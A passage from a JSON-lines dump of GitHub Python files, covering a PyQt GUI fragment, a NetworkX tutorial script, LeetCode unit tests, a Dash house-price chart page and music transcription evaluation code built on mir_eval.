identifier == 2:\n self.tf_stop_angle.setText(str(value))\n self.sl_stop_angle.setSliderPosition(int(value))\n elif identifier == 3:\n self.tf_SID.setText(str(value))\n self.sl_SID.setSliderPosition(int(value))\n elif identifier == 4:\n self.tf_SISOD.setText(str(value))\n self.sl_SISOD.setSliderPosition(int(value))\n 
elif identifier == 5:\n self.tf_size_U.setText(str(value))\n self.sl_size_U.setSliderPosition(int(value))\n elif identifier == 6:\n self.tf_size_V.setText(str(value))\n self.sl_size_V.setSliderPosition(int(value))\n elif identifier == 7:\n self.tf_px_U.setText(str(value))\n elif identifier == 8:\n self.tf_px_V.setText(str(value))\n\n def create_tajectory(self):\n if len(self.pm_actor_list) > 1:\n tmp_list = self.pm_actor_list[::int(self.last_density)]\n for act in self.pm_actor_list:\n self.vtk_handle.remove_actor(act)\n self.on_update_matrices()\n self.last_density = self.current_values[9]\n tmp_list = self.pm_actor_list[::int(self.last_density)]\n for actor in tmp_list:\n self.vtk_handle.add_actors(actor)\n self.vtk_handle.update()\n\n def on_reset_all_values(self):\n for i in range(len(self.initial_values)):\n self.on_set_projection_values(self.initial_values[i], i)\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QDialog()\n prog = ProjMatCreator_logic(MainWindow)\n MainWindow.show()\n sys.exit(app.exec_())","repo_name":"alPreuhs/MotionCreator","sub_path":"ProjectionMatrix/ProjMatCreator_logic.py","file_name":"ProjMatCreator_logic.py","file_ext":"py","file_size_in_byte":7573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"72458453975","text":"# conda activate py36_network_medicine && \\\n# cd /mnt/external_disk/mycodehtml/bio_health/Network_medicine/barabasilab.com_course/Networks_and_Computers/Code/Student_version && \\\n# rm e.l && python networks_and_computers_handson1.py \\\n# 2>&1 | tee -a e.l && code e.l\n\n# ================================================================================\nimport os\ntry:\n\tos.chdir(os.path.join(os.getcwd(), 'Networks_and_Computers/Code/Student_version'))\n\tprint(os.getcwd())\nexcept:\n\tpass\n\nfrom IPython import get_ipython\n\n# ================================================================================\n# Importing required modules\nimport numpy as np\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n# get_ipython().run_line_magic('matplotlib', 'inline')\n\n# ================================================================================\n# change defaults to be less ugly\nmpl.rc('xtick', labelsize=14, color=\"#222222\") \nmpl.rc('ytick', labelsize=14, color=\"#222222\") \nmpl.rc('font', **{'family':'sans-serif','sans-serif':['Arial']})\nmpl.rc('font', size=16)\nmpl.rc('xtick.major', size=6, width=1)\nmpl.rc('xtick.minor', size=3, width=1)\nmpl.rc('ytick.major', size=6, width=1)\nmpl.rc('ytick.minor', size=3, width=1)\nmpl.rc('axes', linewidth=1, edgecolor=\"#222222\", labelcolor=\"#222222\")\nmpl.rc('text', usetex=False, color=\"#222222\")\n\n# ================================================================================\n# NetworkX provides the following \"classes\" (that represent network-related data)\n# as well as \"network analysis algorithms\" (that operate on these objects):\n\n# Graph - Undirected graph with self loops\n# DiGraph - Directed graph with self loops\n# MultiGraph - Undirected Graph with self loops and multiple edges\n# MultiDiGraph - Directed Graph with self loops and multiple edges\n\n# ================================================================================\nprint(nx.__version__)\n# 2.3\n\n# ================================================================================\n# Create an \"empty\", \"undirected\" network\n\nG = nx.Graph()\n\n# 
================================================================================\n# Nodes can be almost anything (numbers, strings, GPS coordinates, etc)\n# Nodes can be added one at a time:\n\n# Add \"0 node\" to \"graph G\"\nG.add_node(0)\n\n# Add \"John node\" to \"graph G\"\nG.add_node(\"John\")\n\n# tuple object representing, say, longitude and latitude\npos = (1.2, 3.4) \nG.add_node(pos)\n\n# ...or many at once from a python container\n# [1,2,3] is a list containing 1, 2, 3\nG.add_nodes_from([1, 2, 3])\n\n# ================================================================================\n# Nodes can have arbitrary attributes (associated with each node and stored in a string-indexed dictionary)\n\n# Add \"Louis node\" + \"Attributes of node\"\nG.add_node(\"Louis\", eye_color='blue', height=6)\n\n# Add \"Laszlo node\"\nG.add_node(\"Laszlo\")\n# Add \"attributes\" to an \"existing node\"\nG.nodes[\"Laszlo\"][\"citations\"] = 10**6\n\n# ================================================================================\n# Get values from nodes\n\nLouis_node_eye_color_attribute=G.nodes[\"Louis\"][\"eye_color\"]\nLouis_node_height_attribute=G.nodes['Louis']['height']\nLaszlo_node_citations_attribute=G.nodes[\"Laszlo\"][\"citations\"]\n# print(\"Louis_node_eye_color_attribute\",Louis_node_eye_color_attribute)\n# print(\"Louis_node_height_attribute\",Louis_node_height_attribute)\n# print(\"Laszlo_node_citations_attribute\",Laszlo_node_citations_attribute)\n# blue\n# 6\n# 1000000\n\n# ================================================================================\n# An edge between node1 and node2: (node1, node2) \n\n# Edges can be added one at a time\n\n# Add \"edge\" between \"node 0\" and \"node 1\"\nG.add_edge(0, 1)\n\n# ================================================================================\n# Add \"multiple edges\" \n\nedge_list = [ (2, 1), (\"Louis\", \"Laszlo\"), (3, 4) ]\nG.add_edges_from(edge_list)\n\n# ================================================================================\n# \"Nodes\" will be \"automatically created\" if nodes don't already exist.\n\n# ================================================================================\n# Edge attributes\n\n# Edges can have arbitrary attributes. 
\n\n# ================================================================================\n# Add \"edge ('Louis', 'Sebastian')\" + \"edge attribute weight=10\"\nG.add_edge(\"Louis\", \"Sebastian\", weight=10)\n\nG.add_edge(\"Hopkinton\", \"Boston\")\nG.edges[\"Hopkinton\", \"Boston\"]['distance'] = 26.2\n\n# ================================================================================\n# Basic operations\n\n# ================================================================================\n# Size of the network\n\n# number of nodes of \"graph G\"\n# print(\"G.number_of_nodes()\",G.number_of_nodes())\n# 12\n\n# number of nodes of \"graph G\"\n# print(\"len(G)\",len(G))\n# 12\n\n# number of edges of \"graph G\"\n# print(\"G.number_of_edges()\",G.number_of_edges())\n# 6\n\n# number of edges of \"graph G\"\n# print(\"G.size()\",G.size())\n# 6\n\n# ================================================================================\n# How to see whether \"nodes\" exist\nres=G.has_node(\"Louis\")\n# print(\"res\",res)\n# True\n\n# How to see whether \"nodes\" exist\nres=\"Sebastian\" in G\n# print(\"res\",res)\n# True\n\n# ================================================================================\n# How to see whether \"edges\" exist\n\nret=G.has_edge(3, 4)\n# print(\"ret\",ret)\n# True\n\nret=G.has_edge(\"Louis\", 0)\n# print(\"ret\",ret)\n# False\n\n# ================================================================================\n# How to find neighbors of a node\n\nneighbors_of_node_1_in_graph_G=list(G.neighbors(1))\n# print(\"neighbors_of_node_1_in_graph_G\",neighbors_of_node_1_in_graph_G)\n# [0, 2]\n\n# ================================================================================\n# * In `DiGraph` objects, `G.neighbors(node)` gives the successors of `node`, as does `G.successors(node)` \n# * Predecessors of `node` can be obtained with `G.predecessors(node)`\n\n# ================================================================================\n# How to iterate over nodes using G.nodes()\n\n# for node, data in G.nodes(data=True): # data=True includes \"node attributes\" as dictionaries\n# print(node)\n# print(data)\n# print(\"\")\n\n# ================================================================================\n# How to iterate over edges using G.edges()\n\n# for n1, n2, data in G.edges(data=True):\n# print([n1,n2])\n# print(data)\n# print(\"\")\n\n# ================================================================================\n# Calculate degrees\n\ndegree_of_node_Louis=G.degree(\"Louis\")\n# print(\"degree_of_node_Louis\",degree_of_node_Louis)\n\ndegree_of_all_nodes_in_graph_G=G.degree()\n# print(\"degree_of_all_nodes_in_graph_G\",degree_of_all_nodes_in_graph_G)\n# [(0, 1), ('John', 0), ((1.2, 3.4), 0), (1, 2), (2, 1), (3, 1), ('Louis', 2), ('Laszlo', 1), (4, 1), ('Sebastian', 1), ('Hopkinton', 1), ('Boston', 1)]\n\ndegree_of_all_nodes_list=[]\nfor one_node in G:\n degree_of_one_node=G.degree(one_node)\n degree_of_all_nodes_list.append(degree_of_one_node)\n# print(\"degree_of_all_nodes_list\",degree_of_all_nodes_list)\n# [1, 0, 0, 2, 1, 1, 2, 1, 1, 1, 1, 1]\n\n# ================================================================================\n# In directed graphs (DiGraph), there are two types of degree.\n\n# in_degree_of_node=directed_graph_G.in_degree(node)\n# out_degree_of_node=directed_graph_G.out_degree(node)\n# total_degree_of_node=directed_graph_G.degree()\n\n# ================================================================================\n# Other operations\n\n# 
================================================================================\n# subgraph of graph G, (which are induced by nodes in nbunch)\n# subgraph(G,nbunch)\n# G.subgraph(nbunch)\n\n# ================================================================================\n# DiGraph (with edges reversed )\n# reverse(G)\n\n# ================================================================================\n# union of 2 graphs\n# union(G1, G2)\n\n# ================================================================================\n# same, but treats nodes of G1, G2 as different \n# disjoint_union(G1, G2)\n\n# ================================================================================\n# \"result graph\" with only the \"edges in common\" between G1, G2\n# intersection(G1, G2)\n\n# ================================================================================\n# \"result graph\" with only the \"edges G1 that aren't in G2\"\n# difference(G1, G2)\n\n# ================================================================================\n# copy of G\n# copy(G) or G.copy()\n\n# ================================================================================\n# the complement graph of graph G \n# complement(G) or G.complement()\n\n# ================================================================================\n# undirected version of graph G (a Graph or MultiGraph)\n# convert_to_undirected(G) or G.to_undirected()\n\n# ================================================================================\n# directed version of G (a DiGraph of MultiDiGraph)\n# convert_to_directed(G) or G.to_directed()\n\n# ================================================================================\n# \"adjacency matrix A\" of graph G (in sparse matrix format; to get full matrix, use A.toarray())\n# adjacency_matrix(G)\n\n# ================================================================================\n# @ Graph I/O\n\n# ================================================================================\n# NetworkX can understand the following common graph formats:\n\n# edge lists\n# adjacency lists\n# GML\n# GEXF\n# Python 'pickle'\n# GraphML\n# Pajek\n# LEDA\n# YAML\n\n# ================================================================================\n# Getting started: \"reading in\" an \"edge list\"\n\n# \"Read in\" the file with the \"options\"\n# comments='#': lines starting with `#` are treated as comments and ignored \n# create_using=nx.Graph(): use a \"Graph object\" to hold the data (i.e., network is undirected) \n# delimiter=' ': data are separated by whitespace\n# nodetype=int: nodes should be treated as integers\n# encoding='utf-8': encoding of the text file containing the edge list is utf-8\n\n# \"read in\" an \"edge list\" from the file 'test.txt'\nG = nx.read_edgelist('./test.txt', comments='#', create_using=nx.Graph(), delimiter=' ', nodetype=int, encoding='utf-8')\n\n# ================================================================================\n# Allowed formats in \"edge list file\"\n\n# - Node pairs with no data \n# 1 2\n\n# - Node pairs with python dictionary \n# 1 2 {weight:7, color:\"green\"}\n\n# ================================================================================\n# Basic analysis\n\n# A large number of basic analyses can be done using\n# - NetworkX + numpy\n# - builtin python functions like min, max, etc\n\n# ================================================================================\n# Number of nodes\nN = len(G)\n# print(\"N\",N)\n# N 443\n\n# Number of edges\nL = 
G.size()\n# print(\"L\",L)\n# L 540\n\n# ================================================================================\ndegrees = [G.degree(node) for node in G]\n# print(\"degrees\",degrees)\n# degrees [5, 2, 5, 5, 4,\n\n# print(\"Average degree: \", 2*L/N)\n# print(\"Average degree (alternate calculation)\", np.mean(degrees))\n# 2.4379232505643342\n# 2.4379232505643342\n\n# Minimum degree\nkmin = min(degrees)\n# print(\"kmin\",kmin)\n# kmin 1\n\n# Maximum degree\nkmax = max(degrees)\n# print(\"kmax\",kmax)\n# kmax 8\n\n# ================================================================================\n# @ Drawing the network\n\n# using the \"force-based\" or \"spring\" layout algorithm\n# fig = plt.figure(figsize=(8,8))\n# plt.title(\"undirected graph G \\n node point size=10 \\n draw this by using draw_spring()\")\nnx.draw_spring(G, node_size=10)\n# plt.show()\n# /mnt/external_disk/Capture_temp/2019_10_13_09:09:27.png\n\n# ================================================================================\n# using the circular layout algorithm\n# fig = plt.figure(figsize=(8,8))\n# plt.title(\"undirected graph G \\n node point size=10 \\n draw this by using draw_circular()\")\nnx.draw_circular(G, node_size=10)\n# plt.show()\n# /mnt/external_disk/Capture_temp/2019_10_13_09:11:28.png\n\n# ================================================================================\n# Plotting the degree distribution\n\n# Let's plot \"degree distribution\" in \"log scale\" first\n\n# numpy can be used to get \"logarithmically-spaced bins\" between the minimum and maximum degree\n\n# Get \"10 logarithmically spaced bins\" between kmin and kmax\nbin_edges = np.logspace(np.log10(kmin), np.log10(kmax), num=10)\n# print(\"bin_edges\",bin_edges)\n# [1. 1.25992105 1.58740105 2. 2.5198421 3.1748021 4. 5.0396842 6.34960421 8. ]\n\n# histogram the data into these bins\ndensity, _ = np.histogram(degrees, bins=bin_edges, density=True)\n\n# ================================================================================\nfig = plt.figure(figsize=(6,4))\n\nlog_be = np.log10(bin_edges)\n# print(\"log_be\",log_be)\n# [0. 
0.10034333 0.20068666 0.30103 0.40137333 0.50171666 0.60205999 0.70240332 0.80274666 0.90308999]\n\n# \"x\" should be midpoint (IN LOG SPACE) of each bin\nx = 10**((log_be[1:] + log_be[:-1])/2)\n# print(\"x\",x)\n# [1.12246205 1.41421356 1.78179744 2.2449241 2.82842712 3.56359487 4.48984819 5.65685425 7.12718975]\n\nplt.loglog(x, density, marker='o', linestyle='none')\nplt.title(\"probability distribution of degree k in log domain\")\nplt.xlabel(r\"degree $k$\", fontsize=16)\nplt.ylabel(r\"$P(k)$: probability of degree $k$ occurring\", fontsize=16)\n\n# remove right and top boundaries because they're ugly\nax = plt.gca()\nax.spines['right'].set_visible(False)\nax.spines['top'].set_visible(False)\nax.yaxis.set_ticks_position('left')\nax.xaxis.set_ticks_position('bottom')\n\n# Show the plot\n# plt.show()\n\n# ================================================================================\n# This is clearly not a network with anything like a heavy-tailed or power law degree distribution.\n\n# ================================================================================\n# Let's also plot it in linear-linear scale.\n\n# The `linspace` command in `numpy` is used to get linearly-spaced numbers between two extremes\n\n\n# Get 10 linearly spaced bins between kmin and kmax\nbin_edges = np.linspace(kmin, kmax, num=10)\n\n# histogram the data into these bins\ndensity, _ = np.histogram(degrees, bins=bin_edges, density=True)\n\n# ================================================================================\n# plot it\n\nfig = plt.figure(figsize=(6,4))\n\n# \"x\" should be the midpoint of each bin (these bins are linear, so no log transform is needed)\nx = (bin_edges[1:] + bin_edges[:-1])/2\n\nplt.plot(x, density, marker='o', linestyle='none')\nplt.title(\"probability distribution of degree k in linear-linear scale\")\nplt.xlabel(r\"degree $k$\", fontsize=16)\nplt.ylabel(r\"$P(k)$: probability of degree $k$ occurring\", fontsize=16)\n\n# remove right and top boundaries because they're ugly\nax = plt.gca()\nax.spines['right'].set_visible(False)\nax.spines['top'].set_visible(False)\nax.yaxis.set_ticks_position('left')\nax.xaxis.set_ticks_position('bottom')\n\nplt.show()\n# /mnt/external_disk/Capture_temp/2019_10_13_10:07:44.png\n\n# ================================================================================\n# Hands-on exercise\n\n# Now split into 6 groups, 3 for `example_1.txt` and 3 for `example_2.txt`. Each group should read in their edge\n\n# list file and do the following:\n\n# * Group 1: Do the basic measurements shown above. What can you suspect about the degree distribution of the network just based on the average and extremes in degree?\n\n# * Group 2: Plot the degree distribution in log-log scale. Also plot it in linear scale. Comment on how this fits with the analysis of Group 1.\n\n# * Group 3: Draw the network using the two layout algorithms shown above. How does the network's appearance echo the findings of groups 1 and 2?\n\n","repo_name":"youngminpark2559/medicine","sub_path":"network_medicine/barabasilab.com_course/00006_Networks_and_Computers/Code/Student_version/networks_and_computers_handson1.py","file_name":"networks_and_computers_handson1.py","file_ext":"py","file_size_in_byte":16102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"34827114288","text":"import unittest\nimport solutions._contest.weekly_168.index as main\n\n\nclass Test(unittest.TestCase):\n def test_isPossibleDivide(self):\n test_patterns = [\n ([3, 2, 1, 2, 3, 4, 3, 4, 5, 9, 10, 11], 3, True),\n ]\n\n for i, (arg1, arg2, expected) in enumerate(test_patterns):\n with self.subTest(test=i):\n s = main.Solution()\n # tree = f.createTreeNode([5, 5, 5, 1, 1, 5])\n self.assertEqual(s.isPossibleDivide(arg1, arg2), expected)\n\n def test_maxFreq(self):\n test_patterns = [\n (\"aababcaab\", 2, 3, 4, 2),\n (\"aaaa\", 1, 3, 3, 2),\n (\"aabcabcab\", 2, 2, 3, 3),\n (\"abcde\", 2, 3, 3, 0)\n ]\n\n for i, (arg1, arg2, arg3, arg4, expected) in enumerate(test_patterns):\n with self.subTest(test=i):\n s = main.Solution()\n # tree = f.createTreeNode([5, 5, 5, 1, 1, 5])\n self.assertEqual(s.maxFreq(arg1, arg2, arg3, arg4), expected)\n\n # def test_maxCandies(self):\n # test_patterns = [\n # # ([1, 0, 1, 0], [7, 5, 4, 100], [\n # # [], [], [1], []], [[1, 2], [3], [], []], [0], 16),\n # # ([1, 0, 0, 0, 0, 0],\n # # [1, 1, 1, 1, 1, 1],\n # # [[1, 2, 3, 4, 5], [], [], [], [], []],\n # # [[1, 2, 3, 4, 5], [], [], [], [], []],\n # # [0],\n # # 6\n # # ),\n # ([1, 0, 0, 0],\n # [1, 2, 3, 4],\n # [[1, 2], [3], [], []],\n # [[2], [3], [1], []],\n # [0], 10)\n # ]\n\n # for i, (arg1, arg2, arg3, arg4, arg5,\n # expected) in enumerate(test_patterns):\n # with self.subTest(test=i):\n # s = main.Solution()\n # # tree = f.createTreeNode([5, 5, 5, 1, 1, 5])\n # self.assertEqual(\n # s.maxCandies(\n # arg1,\n # arg2,\n # arg3,\n # arg4,\n # arg5),\n # expected)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"nk18chi/leetcode-python","sub_path":"solutions/_contest/weekly_168/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"37214037438","text":"import dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nfrom data_loaders import CityHousesLoader\nfrom data_loaders import HousesParameters as house_params\nfrom plotly import graph_objects as go\n\nfrom .base_houses_prices_page import BaseHousesPricesPage\n\n\nclass CityHousesKeys:\n CITY_DROPDOWN = \"CITY_DROPDOWN\"\n GRAPH = \"GRAPH\"\n OFFER_LINK = \"OFFER_LINK\"\n AREA_SLIDER = \"AREA_SLIDER\"\n DATE_PICKER = \"DATE_PICKER\"\n PRICE_FROM = \"PRICE_FROM\"\n PRICE_TO = \"PRICE_TO\"\n\n\nclass CityHousesPage(BaseHousesPricesPage):\n data_loader = CityHousesLoader()\n KEYS = CityHousesKeys()\n\n @classmethod\n def register_callbacks(cls, app):\n @app.callback(\n Output(cls.KEYS.GRAPH, \"figure\"),\n [\n Input(cls.KEYS.DATE_PICKER, \"start_date\"),\n Input(cls.KEYS.DATE_PICKER, \"end_date\"),\n Input(cls.KEYS.CITY_DROPDOWN, \"value\"),\n Input(cls.KEYS.PRICE_FROM, \"value\"),\n Input(cls.KEYS.PRICE_TO, \"value\"),\n Input(cls.KEYS.AREA_SLIDER, \"value\"),\n ],\n )\n def callback_update_figure(start_date, end_date, city_value, price_from, price_to, area):\n
cls._update_param(house_params.START_DATE, start_date)\n cls._update_param(house_params.END_DATE, end_date)\n cls._update_param(house_params.CITY, city_value)\n cls._update_param(house_params.PRICE_FROM, price_from)\n cls._update_param(house_params.PRICE_TO, price_to)\n areas = cls._get_areas_options()\n cls._update_param(house_params.AREA, [areas[area[0]], areas[area[1]]])\n return cls._get_graph()\n\n @app.callback(Output(cls.KEYS.OFFER_LINK, \"href\"), Input(cls.KEYS.GRAPH, \"clickData\"))\n def display_click_data(clickData):\n if clickData:\n return clickData[\"points\"][0].get(\"text\")\n\n @classmethod\n def _get_graph(cls):\n data = cls.dataframe.get(\"plain\")\n return cls._make_bar(data, \"City house offers with their prices\")\n\n @classmethod\n def _make_bar(cls, data, title):\n color = {\"Aftermarket\": \"pink\", \"Primary market\": \"deeppink\"}\n data[\"index\"] = list(range(len(data)))\n fig = go.Figure()\n for lbl in data[\"market\"].unique():\n dfp = data[data[\"market\"] == lbl]\n fig.add_traces(\n go.Bar(\n x=dfp[\"index\"],\n y=dfp[\"price\"],\n name=lbl,\n marker=dict(color=color[lbl]),\n customdata=data[\"name\"],\n text=data[\"website\"],\n )\n )\n\n fig.update_traces(\n marker_line_width=0,\n hovertemplate=\"Name:%{customdata}
<br>        %{x}<br>        Price:%{y}<br>        www: %{text} \",\n showlegend=True,\n )\n fig.update_layout(\n clickmode=\"event+select\",\n title_text=title,\n title_font=dict(\n size=20,\n color=\"rgb(101, 102, 148)\",\n ),\n font_color=\"rgb(82, 83, 130)\",\n plot_bgcolor=\"rgba(0, 0, 0, 0)\",\n paper_bgcolor=\"rgba(0, 0, 0, 0)\",\n xaxis=dict(\n title=\"House offer\",\n showticklabels=True,\n tickvals=data[\"index\"],\n ticktext=data[\"datetime\"],\n ticklen=20,\n dtick=1,\n ticks=\"inside\",\n tickfont=dict(color=\"crimson\", size=6),\n ),\n yaxis=dict(\n title=\"Offer price\",\n showgrid=False,\n zeroline=False,\n ),\n )\n return fig\n","repo_name":"Riwuko/housestats","sub_path":"app/pages/city_houses_page.py","file_name":"city_houses_page.py","file_ext":"py","file_size_in_byte":3782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"21544085280","text":"import mir_eval\nimport numpy as np\n\n\nfrom . import Data\n\ndef _listOfListToTuple(nested_list):\n return [tuple(l) for l in nested_list]\n\ndef compareBracket(intervalEst, intervalGT):\n nGT = len(intervalGT)\n nEst = len(intervalEst)\n\n \n nUnion = len(set(_listOfListToTuple(intervalEst+ intervalGT)))\n nCorrect = nGT+nEst-nUnion\n\n return nGT, nEst, nCorrect\n \n\ndef intersectTwoInterval(intervalA, intervalB):\n l = max(intervalA[0], intervalB[0])\n r = min(intervalA[1], intervalB[1])\n return (l,r)\n\ndef findIntersectListOfIntervals(listA, listB):\n i = 0\n j = 0\n result = []\n while i<len(listA) and j<len(listB):\n l = max(listA[i][0], listB[j][0])\n r = min(listA[i][1], listB[j][1])\n if r>=l:\n # check if (l,r) can be merged into the previous one\n if len(result)>0 and result[-1][1] == l:\n result[-1] = (result[-1][0],r)\n else:\n result.append((l,r))\n \n if listA[i][1] < listB[j][1]:\n i = i+1\n else:\n j = j+1\n\n \n \n return result\n\n\n \ndef computeIntervalLengthSum(intervals, countZero=True):\n s = 0\n if countZero:\n prevEnd = -1\n for e in intervals:\n s+= e[1]-e[0]\n if prevEnd < e[0]:\n s+= 1\n\n prevEnd = e[1]\n else:\n for e in intervals:\n s+= e[1]-e[0]\n\n return s\n\n\ndef compareFramewise(intervalEst, intervalGT, countZero=True):\n nEst = computeIntervalLengthSum(intervalEst, countZero)\n nGT = computeIntervalLengthSum(intervalGT, countZero)\n intersected = findIntersectListOfIntervals(intervalEst,intervalGT)\n nIntersected = computeIntervalLengthSum(intersected, countZero)\n nUnion = nGT+nEst- nIntersected\n\n return nGT,nEst, nIntersected\n\n\n\n\ndef midi_to_freq(midi):\n if midi>=0:\n freq = 2**((midi -69)/12)*440\n else:\n # tricks for pedals\n freq = 2**((-midi -69)/12)*440*100\n return freq\ndef getSpan(eventList):\n r = max([e.end for e in eventList])\n return r\n\n\ndef computeFrameScore(estimated, gt, eventTypes):\n # by default step is 0.01 to make it aligned with most papers\n\n # len(eventTypes)\n\n # eventTypes = set([e.pitch for e in estimated] +\n # [gt.pitch for e in estimated])\n\n if len(estimated)==0 or len(gt)==0:\n return 0,0,0\n\n\n\n\n intervalsA = Data.prepareIntervalsNoQuantize(estimated, eventTypes)[\"intervals\"]\n intervalsB = Data.prepareIntervalsNoQuantize(gt, eventTypes)[\"intervals\"]\n assert(len(intervalsA) == len(eventTypes))\n assert(len(intervalsB) == len(eventTypes))\n\n nGT = 0\n nEst = 0\n nCorrect = 0\n\n for IA, IB in zip(intervalsA, intervalsB):\n\n cur_nGT, cur_nEst, cur_nCorrect = compareFramewise(IA, IB, countZero=False)\n # print(compareFramewise(IA, IB))\n nGT += cur_nGT\n nEst += cur_nEst\n nCorrect += cur_nCorrect\n\n p = nCorrect/(nEst+1e-8)\n r = nCorrect/(nGT+1e-8)\n f = 2*nCorrect/(nEst+ nGT+1e-8)\n o = 
nCorrect/(nEst+nGT-nCorrect+1e-8)\n\n return p,r,f,o\n \n\n\ndef compareMatchedDeviations(estimated, gt, splitPedal):\n resultEst, pedalEst = prepareDataForEvaluation(estimated, splitPedal=splitPedal)\n resultGT, pedalGT= prepareDataForEvaluation(gt, splitPedal=splitPedal)\n\n metrics = dict()\n\n\n matched = mir_eval.transcription.match_notes(\n resultGT[\"intervals\"],\n resultGT[\"pitches\"],\n resultEst[\"intervals\"],\n resultEst[\"pitches\"],\n onset_tolerance = 0.1,\n offset_min_tolerance = 0.1\n )\n\n \n # compute deviations \n deviations = []\n for idxGT, idxEst in matched:\n intervalGT = resultGT[\"intervals\"][idxGT]\n intervalEST = resultEst[\"intervals\"][idxEst]\n curDiff = intervalGT-intervalEST\n deviations.append(curDiff)\n\n return deviations \n\n\ndef compareTranscription(estimated, gt, splitPedal=False, computeDeviations = False, **kwargs):\n\n\n # convert data into the format mir_eval use \n\n resultEst, pedalEst = prepareDataForEvaluation(estimated, splitPedal=splitPedal)\n resultGT, pedalGT= prepareDataForEvaluation(gt, splitPedal=splitPedal)\n\n # print(resultEst)\n\n # compute framewise (pitch activation level) note level score (onest, onset+ offset, onset+offset+velocity) also evaluate pedal individually\n\n metrics = dict()\n # 1. framewise score (pitch activation level score)\n # computeFrameScore\n\n\n metrics[\"frame\"] = computeFrameScore(estimated, gt, eventTypes = list(range(21,108+1)))\n \n\n \n nGT = resultGT[\"intervals\"].shape[0]\n nEst = resultEst[\"intervals\"].shape[0]\n\n\n # 2. note onset \n\n\n metrics[\"note\"] = mir_eval.transcription.precision_recall_f1_overlap(\n resultGT[\"intervals\"],\n resultGT[\"pitches\"],\n resultEst[\"intervals\"],\n resultEst[\"pitches\"],\n offset_ratio = None,\n **kwargs\n )\n\n metrics[\"note+velocity\"] = mir_eval.transcription_velocity.precision_recall_f1_overlap(\n resultGT[\"intervals\"],\n resultGT[\"pitches\"],\n resultGT[\"velocities\"],\n resultEst[\"intervals\"],\n resultEst[\"pitches\"],\n resultEst[\"velocities\"],\n offset_ratio = None,\n **kwargs\n )\n \n # 3. 
note onset + offset \n metrics[\"note+offset\"] = mir_eval.transcription.precision_recall_f1_overlap(\n resultGT[\"intervals\"],\n resultGT[\"pitches\"],\n resultEst[\"intervals\"],\n resultEst[\"pitches\"],\n **kwargs\n )\n\n # note onset + offset + velocity\n metrics[\"note+velocity+offset\"] = mir_eval.transcription_velocity.precision_recall_f1_overlap(\n resultGT[\"intervals\"],\n resultGT[\"pitches\"],\n resultGT[\"velocities\"],\n resultEst[\"intervals\"],\n resultEst[\"pitches\"],\n resultEst[\"velocities\"],\n **kwargs\n )\n \n metrics[\"nGT\"] = nGT\n metrics[\"nEst\"] = nEst\n\n # deviations of matched notes\n if computeDeviations:\n matched = mir_eval.transcription.match_notes(\n resultGT[\"intervals\"],\n resultGT[\"pitches\"],\n resultEst[\"intervals\"],\n resultEst[\"pitches\"],\n onset_tolerance = 0.1,\n offset_min_tolerance = 0.1\n )\n\n # compute deviations \n deviations = []\n for idxGT, idxEst in matched:\n intervalGT = resultGT[\"intervals\"][idxGT]\n intervalEST = resultEst[\"intervals\"][idxEst]\n curDiff = intervalGT-intervalEST\n deviations.append(curDiff.tolist())\n\n metrics[\"deviations\"] = deviations\n\n\n if len(pedalEst)>0:\n # evaluate pedals\n\n for cc in pedalEst:\n curEst = pedalEst[cc]\n curGT = pedalGT[cc]\n nGTPedal = curGT[\"intervals\"].shape[0]\n nEstPedal = curEst[\"intervals\"].shape[0]\n\n if nGTPedal>0:\n metrics[\"pedal\"+str(cc)+\"frame\"] = computeFrameScore(estimated, gt, eventTypes =[-cc] )\n metrics[\"pedal\"+str(cc)] = mir_eval.transcription.precision_recall_f1_overlap(\n curGT[\"intervals\"],\n curGT[\"pitches\"],\n curEst[\"intervals\"],\n curEst[\"pitches\"],\n offset_ratio = None,\n **kwargs\n )\n\n metrics[\"pedal\"+str(cc) +\"+offset\"] = mir_eval.transcription.precision_recall_f1_overlap(\n curGT[\"intervals\"],\n curGT[\"pitches\"],\n curEst[\"intervals\"],\n curEst[\"pitches\"],\n **kwargs\n )\n\n metrics[\"pedal\"+str(cc)+\"nGT\"] = nGTPedal \n metrics[\"pedal\"+str(cc)+\"nEst\"] = nEstPedal \n \n\n\n # each entry has (precision, recall, f1, average overlap ratio)\n\n return metrics\n\n\n\n\n\ndef prepareDataForEvaluation(notes, ccList = [64,67], splitPedal=False):\n # convert notes to \n # intervals: np.ndarray shape = (n, 2) \n # pitches: np.ndarray shape = (n,), in Hz\n # velocities: np.ndarray shape=(n,) between 0- 127\n\n \n\n # filter out unsupported symbols\n notes = [n for n in notes if -n.pitch in ccList or n.pitch>=0]\n\n\n if splitPedal:\n intervals = np.array([[n.start, n.end] for n in notes if n.pitch>=0])\n pitches = np.array([midi_to_freq(n.pitch) for n in notes if n.pitch>=0])\n velocities = np.array([n.velocity for n in notes if n.pitch>=0])\n else:\n intervals = np.array([[n.start, n.end] for n in notes])\n pitches = np.array([midi_to_freq(n.pitch) for n in notes])\n velocities = np.array([n.velocity for n in notes])\n\n if intervals.shape == (0,):\n intervals = np.zeros(shape= (0,2))\n # for pedal, we group all pedals individually\n\n pedals = dict()\n\n for cc in ccList:\n\n intervals_pedal = np.array([[n.start, n.end] for n in notes if n.pitch==-cc])\n pitches_pedal = np.array([1 for n in notes if n.pitch==-cc])\n velocities_pedal = np.array([n.velocity for n in notes if n.pitch==-cc])\n\n if intervals_pedal.shape == (0,):\n intervals_pedal = np.zeros(shape= (0,2))\n\n curResult = { \"intervals\": intervals_pedal,\n \"pitches\": pitches_pedal,\n \"velocities\": velocities_pedal\n }\n pedals[cc] = curResult\n \n result = { \"intervals\": intervals,\n \"pitches\": pitches,\n \"velocities\": velocities\n }\n\n 
